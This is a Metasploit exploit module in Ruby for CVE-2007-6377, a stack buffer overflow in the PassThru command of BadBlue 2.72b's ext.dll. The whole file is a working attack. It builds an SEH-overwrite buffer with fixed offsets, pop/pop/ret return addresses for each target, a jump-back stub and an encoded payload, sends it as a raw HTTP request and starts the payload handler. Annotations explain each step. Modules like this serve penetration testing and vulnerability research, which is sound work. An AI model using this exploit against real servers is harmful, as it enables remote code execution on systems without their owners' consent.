##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  # Remote stack buffer overflow in the "PassThru" command of BadBlue's
  # ext.dll ISAPI extension (CVE-2007-6377). An overlong query string
  # overwrites a structured exception handler record; execution is regained
  # through a pop/pop/ret gadget inside ext.dll (see 'Targets').
  Rank = GreatRanking

  # NOTE: BadBlue sends no HTTP headers at all for '/'. A proper Server
  # header is only returned for /index.html or for a HEAD request, hence the
  # HEAD-based fingerprint. The pattern only confirms the product, not its
  # version, and this module defines no check() method, so the target (and
  # therefore the ext.dll build the 'Ret' gadget belongs to) has to be
  # chosen by the operator.
  HttpFingerprint = { :method => 'HEAD', :pattern => [ /BadBlue\// ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Seh

  # Module metadata. Nothing here is computed; see the inline notes for the
  # security-relevant fields.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BadBlue 2.72b PassThru Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the PassThru
        functionality in ext.dll in BadBlue 2.72b and earlier.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2007-6377' ],
          [ 'OSVDB', '42416' ],
          [ 'BID', '26803' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      # The overflow happens inside the web server process itself.
      'Privileged'     => true,
      'Payload'        =>
        {
          # The payload travels inside a raw URL query string, so every byte
          # that would terminate or re-delimit the request is forbidden:
          # NUL, LF, VT, CR, space, '#', '%', '&', '+', '/', ':', '<', '=',
          # '?' and '\'. 'Space' is the room left in front of the SEH record.
          'Space'           => 750,
          'BadChars'        => "\x00\x0a\x0b\x0d\x20\x23\x25\x26\x2b\x2f\x3a\x3c\x3d\x3f\x5c",
          'StackAdjustment' => -3500,
          #'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,
          'DisableNops'     => 'True',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # 'Ret' is a pop/pop/ret gadget inside ext.dll, so each entry is
          # tied to one specific build of that DLL (identified by its MD5
          # where known). Target 0 is the build distributed on badblue.com
          # as of Jul 7th 2010.
          [ 'BadBlue EE 2.7 Universal', { 'Ret' => 0x10033f44 } ], # pop/pop/ret in ext.dll v1.0.0.1 (06a6dc81924ba94bfbbd00902d054db2)
          [ 'BadBlue 2.72b Universal',  { 'Ret' => 0x1003f2f3 } ]  # pop/pop/ret from ?? (DLL build not recorded)
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 10 2007'))
  end

  # Builds the overflowing PassThru request, fires it and hands over to the
  # payload handler. The HTTP response is not inspected.
  #
  # Layout of the overflow data (byte offsets from its first byte, plen =
  # length of the encoded payload):
  #   0          .. 4100-plen  random filler (payload bad chars excluded)
  #   4100-plen  .. 4100       encoded payload
  #   4100       .. 4108       random filler
  #   4108       .. 4112       pointer with its top bit set (see below)
  #   4112       .. 4116       random filler
  #   4116       .. 4124       SEH record: 2-byte short jmp, 2 pad bytes,
  #                            4-byte handler address = target.ret
  #   4124       .. 4126       2 bytes the original author found corrupted
  #   4126       ..            near jmp back to the start of the payload
  def exploit
    seh_offset = 4116
    # While re-deriving the offset: buf = Rex::Text.pattern_create(seh_offset)
    buf = rand_text(seh_offset)

    # SEH record. After the pop/pop/ret gadget lands on the nSEH slot, the
    # short jump skips the remaining 8 bytes (2 pad, 4 handler, 2 corrupted)
    # and reaches the jmp-back stub appended at the very end.
    # Original note: "Need to jump over the nul byte".
    seh_record = Rex::Arch::X86.jmp_short(8) + rand_text(2) + [target.ret].pack('V')
    buf << seh_record

    # Place the encoded payload so that it ends 16 bytes before the SEH record.
    payload_len   = payload.encoded.length
    payload_start = seh_offset - 16 - payload_len
    buf[payload_start, payload_len] = payload.encoded

    # This pointer will force a crash when it is used in a lock instruction;
    # the set high bit is what makes the access fault and dispatch to the
    # overwritten handler.
    crash_ptr = rand_text(3) + [0x80 | rand(256)].pack('C')
    buf[seh_offset - 8, 4] = crash_ptr

    # These two bytes get corrupted, so nothing useful can live here.
    buf << rand_text(2)

    # Stub that jumps back to the payload. Distance from the stub to the
    # payload start: 2 corrupted bytes + 8-byte SEH record + 16-byte gap +
    # the payload itself.
    jump_back = 2 + 8 + 16 + payload_len
    buf << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{jump_back}").encode_string

    # The overflow data is appended verbatim after the PassThru command.
    uri = "/ext.dll?mfcisapicommand=PassThru&" + buf

    print_status("Trying target #{target.name}...")
    send_request_raw({ 'uri' => uri }, 5)

    handler
    disconnect
  end

end